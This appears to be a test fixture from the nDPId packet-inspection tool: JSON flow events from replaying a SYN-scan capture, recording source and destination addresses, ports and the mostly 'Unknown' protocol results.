+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
